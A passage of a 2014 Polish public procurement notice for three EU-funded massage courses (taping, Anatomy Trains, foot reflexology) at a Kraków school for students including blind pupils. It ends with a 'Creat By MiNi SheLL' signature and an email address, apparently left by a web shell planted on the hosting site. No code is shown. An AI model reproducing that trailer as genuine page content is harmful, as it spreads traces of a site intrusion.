<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2014 godzina 12:00, miejsce: Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 213.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego za pośrednictwem Programu Operacyjnego Kapitał Ludzki, działanie 9.2; Projekt Systemowy Województwa Małopolskiego Modernizacja Kształcenia Zawodowego w Małopolsce..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> organizacja i przeprowadzenie kursu w masażu Taping jako terapia wspomagająca tradycyjne metody usprawniania,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowe wymagania związane z organizacją i przeprowadzeniem kursu w masażu Taping jako terapia wspomagająca tradycyjne metody usprawniania

Przedmiotem I części zamówienia jest organizacja i przeprowadzenie kursu 
w masażu Taping jako terapia wspomagająca tradycyjne metody usprawniania. 
Kurs w ramach I części zamówienia będzie realizowany w dwóch etapach.

Liczba uczestników: 
W kursie w masażu Taping jako terapia wspomagająca tradycyjne metody usprawniania weźmie udział 30 uczniów i uczennic ze Szkoły Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, ul. Królewska 86,   30-079 Kraków - 3 grupy po 10 uczniów, w tym uczniowie niewidomi i słabowidzący. 

Czas trwania kursu : 
W trakcie kursu zostanie zrealizowanych 16 godzin zajęć dla jednej grupy (4 godziny zajęć teoretycznych, 12 godzin zajęć praktycznych) czyli łącznie dla 3 grup: 48 godzin, przy czym przez 1 godzinę trwania kursu Zamawiający rozumie godzinę lekcyjną 45 minut. 
Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej, może trwać maksymalnie 8 godzin dziennie. W trakcie kursu przewiduje się przerwę trwającą 30 minut. 
Umowa będzie realizowana w Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie.   

Zamawiający udostępnia bezpłatnie sale wykładowe w godzinach,            
w których nie są wykorzystywane do prowadzenia zajęć szkolnych.               

Czas realizacji kursu: 
Zaplanowano łącznie 48 godzin kursu dla 30 uczniów i uczennic, w tym osoby niewidome i słabowidzące. 
Kurs realizowany będzie w dwóch etapach:
a.	etap I do 08 grudnia 2014r., w ramach którego do obowiązków Wykonawcy należeć będzie przeprowadzenie 16 godzin kursu dla 1 grupy uczniów, 
b.	etap II od 1 marca do 10 maja 2015r., w ramach którego do obowiązków Wykonawcy należeć będzie przeprowadzenie 32 godzin kursu dla 2 grup uczniów.                       

Termin realizacji: listopad 2014r. - 10 maja 2015r.
Zamawiający zaleca, aby kurs zaplanowany był w uzgodnieniu z przedstawicielem Zamawiającego - Liderem szkolnym. 

Miejsce realizacji kursu: 
Szkoła Policealna Integracyjna Masażu Leczniczego Nr 2 w Krakowie.

Minimalna  tematyka kursu:
Filozofia, zasady główne, diagnostyka i techniki kinesiology tapingu, zdobycie umiejętności testowania powięzi mięśniowych, diagnozowanie zaburzeń w układzie ruchu, omówienie oraz nabycie umiejętności aplikacji technik mięśniowej, korekcyjnej, powięziowej, więzadłowej, funkcjonalnej i limfatycznej, problemy funkcjonalne w obrębie kręgosłupa: szyjnego, piersiowego, lędźwiowego, lędźwiowo - krzyżowego, kończyn górnych i kończyn dolnych.
Podczas kursu należy wykorzystać zakupiony Atlas anatomii człowieka Nettera. Polskie mianownictwo anatomiczne  celem lepszego przyswajania, zapamiętywania i utrwalania nabywanej wiedzy.

Obowiązki Wykonawcy:
a.	zapewnienie dostępu do odpowiedniego wyposażenia specjalistycznego 
i materiałów: Wykonawca dostarczy w ramach realizacji kursu: plastry sztuk 60 (2 rolki plastrów na ucznia do wykorzystania na kursie oraz reszta na własność kursanta), nożyczki sztuk 10 (materiały te nie stanowią własności kursantów), 
b.	zapewnienie  materiałów dydaktycznych, które przechodzą na własność uczestnika kursu w formie płyt CD,
c.	zakup 2 sztuk pozycji: Atlas anatomii człowieka Nettera. Polskie mianownictwo anatomiczne F.H.Netter e - book EPUB, które po zakończeniu kursu przechodzą na własność Szkoły Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, 
d.	zapewnienie realizacji kursu przez wykwalifikowaną kadrę, posiadającą kwalifikacje, doświadczenie zawodowe i wiedzę merytoryczną z tematu objętego przedmiotem zamówienia,
e.	realizacja kursu zgodnie z harmonogramem realizacji przedmiotu zamówienia ustalonym z Przedstawicielem zamawiającego - Liderem Szkolnym po podpisaniu umowy,
f.	po zakończeniu kursu wypełnienie z uczestnikami anonimowej ankiety ewaluacyjnej, 
g.	przygotowanie, podpisanie i wydanie certyfikatów/zaświadczeń udziału 
w kursie.

Zaświadczenie powinno zawierać informacje o wymiarze godzin oraz program zajęć i musi zostać wydane zgodnie z aktualnymi wytycznymi Departamentu Zarządzania Europejskim Funduszem Społecznym Ministerstwa Rozwoju Regionalnego, dotyczącymi zasad oznaczania projektów i działań informacyjno-promocyjnych w ramach Programu Operacyjnego Kapitał Ludzki. 
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy. 

W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sali, w których będzie prowadzony kurs, zgodnie 
z Wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników o fakcie współfinansowania kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z Wytycznymi POKL.


Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty:
a. listę obecności z własnoręcznymi podpisami uczestników kursu  w każdym dniu kursu,
b. program kursu oraz dziennik zajęć, 
c. potwierdzenie odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów, 
d. oryginały ankiet ewaluacyjnych, 
e. kopię wydanych certyfikatów / zaświadczeń oraz listę potwierdzającą ich odbiór przez uczestników, 
f. informację o zrealizowaniu usługi wraz z rachunkiem/fakturą VAT..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> organizacja i przeprowadzenie kursu w masażu Anatomy Trains.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowe wymagania związane z organizacją i przeprowadzeniem kursu w masażu Anatomy Trains

Przedmiotem II części zamówienia jest organizacja i przeprowadzenie kursu 
w masażu Anatomy Trains. 
Kurs w ramach II części zamówienia będzie realizowany w dwóch etapach.

Liczba uczestników: 
W kursie w masażu Anatomy Trains weźmie udział 30 uczniów i uczennic ze Szkoły Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, 
ul. Królewska 86,   30-079 Kraków - 3 grupy po 10 uczniów, w tym uczniowie niewidomi i słabowidzący. 

Czas trwania kursu: 
W trakcie kursu zostanie zrealizowanych 20 godzin zajęć dla jednej grupy (9 godzin zajęć teoretycznych, 11 godzin zajęć praktycznych) czyli łącznie dla 3 grup: 60 godzin, przy czym przez 1 godzinę trwania kursu Zamawiający rozumie godzinę lekcyjną 45 minut. 
Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej, może trwać maksymalnie 10 godzin dziennie. W trakcie kursu przewiduje się przerwę trwającą 30 minut. 
Umowa będzie realizowana w Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie.   

Zamawiający udostępnia bezpłatnie sale wykładowe w godzinach, w których nie są wykorzystywane do prowadzenia zajęć szkolnych.               

Czas realizacji kursu: 
Zaplanowano łącznie 60 godzin kursu dla 30 uczniów i uczennic, w tym osoby niewidome i słabowidzące. 
Kurs realizowany będzie w dwóch etapach:
a.	etap I do 08 grudnia 2014r., w ramach którego do obowiązków Wykonawcy należeć będzie przeprowadzenie 20 godzin kursu dla 1 grupy uczniów, 
b.	etap II od 1 marca do 10 maja 2015r., w ramach którego do obowiązków Wykonawcy należeć będzie przeprowadzenie 40 godzin kursu dla 2 grup uczniów.                      

Termin realizacji: listopad 2014r. - 10 maja 2015r.
Zamawiający zaleca, aby kurs zaplanowany był w uzgodnieniu 
z przedstawicielem Zamawiającego - Liderem szkolnym. 

Miejsce realizacji kursu: 
Szkoła Policealna Integracyjna Masażu Leczniczego Nr 2 w Krakowie.

Minimalna  tematyka kursu:

Część teoretyczna powinna obejmować historię i podstawowe pojęcia koncepcji Anatomy Trains, omówienie budowy i właściwości powięzi, Body Reading - terminologię i zastosowanie, przebieg i funkcje taśm: powierzchownej tylnej, powierzchownej przedniej, bocznej, spiralnej, ramienia, funkcjonalnej i głębokiej przedniej. 
Ćwiczenia praktyczne powinny obejmować techniki uwalniania powięziowego wybranych mięśni w obrębie taśm: powierzchownej tylnej, powierzchownej przedniej, bocznej, spiralnej, ramienia, funkcjonalnej i głębokiej przedniej.


Obowiązki Wykonawcy:
a.	zapewnienie dostępu do odpowiedniego wyposażenia specjalistycznego 
i materiałów: Wykonawca dostarczy w ramach realizacji kursu środki poślizgowe w ilości wystarczającej na realizację kursu dla 30 osób, model układu kostnego człowieka (szkielet) - materiały te nie stanowią własności kursantów, 
b.	zapewnienie  materiałów dydaktycznych, które przechodzą na własność uczestnika kursu w formie płyt CD,
c.	zapewnienie realizacji kursu przez wykwalifikowaną kadrę, posiadającą kwalifikacje, doświadczenie zawodowe i wiedzę merytoryczną z tematu objętego przedmiotem zamówienia,
d.	realizacja kursu zgodnie z harmonogramem realizacji przedmiotu zamówienia ustalonym z Przedstawicielem zamawiającego - Liderem Szkolnym po podpisaniu umowy,
e.	po zakończeniu kursu wypełnienie z uczestnikami anonimowej ankiety ewaluacyjnej, 
f.	przygotowanie, podpisanie i wydanie certyfikatów/zaświadczeń udziału 
w kursie.

Zaświadczenie powinno zawierać informacje o wymiarze godzin oraz program zajęć i musi zostać wydane zgodnie z aktualnymi wytycznymi Departamentu Zarządzania Europejskim Funduszem Społecznym Ministerstwa Rozwoju Regionalnego, dotyczącymi zasad oznaczania projektów i działań informacyjno-promocyjnych w ramach Programu Operacyjnego Kapitał Ludzki. 
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy. 

W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sali, w których będzie prowadzony kurs, zgodnie 
z Wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników o fakcie współfinansowania kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z Wytycznymi POKL.


Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty:
a. listę obecności z własnoręcznymi podpisami uczestników  w każdym dniu kursu,
b. program kursu oraz dziennik zajęć, 
c. potwierdzenie odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów, 
d. oryginały ankiet ewaluacyjnych, 
e. kopię wydanych certyfikatów / zaświadczeń oraz listę potwierdzającą ich odbiór przez uczestników, 
f. informację o zrealizowaniu usługi wraz z rachunkiem/fakturą VAT..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> organizacja i przeprowadzenie kursu w masażu Refleksoterapia stóp.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowe wymagania związane z organizacją i przeprowadzeniem kursu w masażu Refleksoterapia stóp

Przedmiotem III części zamówienia jest organizacja i przeprowadzenie kursu 
w  masażu Refleksoterapia stóp.

Liczba uczestników: 
W kursie w masażu Refleksoterapia stóp weźmie udział 30 uczniów i uczennic ze Szkoły Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, 
ul. Królewska 86,   30-079 Kraków - 3 grupy po 10 uczniów, w tym uczniowie niewidomi i słabowidzący. 

Czas trwania kursu: 
W trakcie kursu zostanie zrealizowanych 15 godzin zajęć dla jednej grupy (3 godziny zajęć teoretycznych, 12 godzin zajęć praktycznych), czyli łącznie dla 3 grup: 45 godzin, przy czym przez 1 godzinę trwania kursu Zamawiający rozumie godzinę lekcyjną 45 minut. 
Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej, może trwać maksymalnie 8 godzin dziennie. W trakcie kursu przewiduje się przerwę trwającą 30 minut. 
Umowa będzie realizowana w Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie.   

Zamawiający udostępnia bezpłatnie sale wykładowe w godzinach,  w których nie są wykorzystywane do prowadzenia zajęć szkolnych.               

Czas realizacji kursu: 
Zaplanowano łącznie 45 godzin kursu dla 30 uczniów i uczennic, w tym osoby niewidome i słabowidzące - 3 grupy po 10 osób, 15 godzin kursu dla jednej grupy.
                      
Termin realizacji: luty 2015r. - 24 maja 2015r.
Zamawiający zaleca, aby kurs zaplanowany był w uzgodnieniu 
z przedstawicielem Zamawiającego - Liderem szkolnym. 

Miejsce realizacji kursu: 
Szkoła Policealna Integracyjna Masażu Leczniczego Nr 2 w Krakowie.

Minimalna  tematyka kursu:
Historia i teoria refleksologii, koncepcja krążenia energii w ludzkim ciele, zasady refleksoterapii, zasady i metodyka zabiegu, wskazania i przeciwwskazania do zabiegu, podział stopy na strefy, wyznaczanie linii osi, odnajdowanie poszczególnych punktów refleksologicznych.

Obowiązki Wykonawcy:
a.	zapewnienie dostępu do odpowiedniego wyposażenia specjalistycznego i materiałów: Wykonawca dostarczy w ramach realizacji kursu: oliwki do masażu, ręczniki i prześcieradła jednorazowe, płyny do dezynfekcji w ilości wystarczającej do przeprowadzenia kursu dla 30 osób (materiały te nie stanowią własności kursantów), 
b.	zapewnienie  materiałów dydaktycznych, które przechodzą na własność uczestnika kursu w formie płyt CD,
c.	zapewnienie realizacji kursu przez wykwalifikowaną kadrę, posiadającą kwalifikacje, doświadczenie zawodowe i wiedzę merytoryczną z tematu objętego przedmiotem zamówienia,
d.	realizacja kursu zgodnie z harmonogramem realizacji przedmiotu zamówienia ustalonym z Przedstawicielem zamawiającego - Liderem Szkolnym po podpisaniu umowy,
e.	po zakończeniu kursu wypełnienie z uczestnikami anonimowej ankiety ewaluacyjnej, 
f.	przygotowanie, podpisanie i wydanie certyfikatów/zaświadczeń udziału w kursie.

Zaświadczenie powinno zawierać informacje o wymiarze godzin oraz program zajęć i musi zostać wydane zgodnie z aktualnymi wytycznymi Departamentu Zarządzania Europejskim Funduszem Społecznym Ministerstwa Rozwoju Regionalnego, dotyczącymi zasad oznaczania projektów i działań informacyjno-promocyjnych w ramach Programu Operacyjnego Kapitał Ludzki. 
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy. 

W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sali, w których będzie prowadzony kurs, zgodnie 
z Wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników o fakcie współfinansowania kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z Wytycznymi POKL.


Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty:
a. listę obecności z własnoręcznymi podpisami uczestników  w każdym dniu kursu,
b. program kursu oraz dziennik zajęć, 
c. potwierdzenie odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów, 
d. oryginały ankiet ewaluacyjnych, 
e. kopię wydanych certyfikatów / zaświadczeń oraz listę potwierdzającą ich odbiór przez uczestników, 
f. informację o zrealizowaniu usługi wraz z rachunkiem/fakturą VAT..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com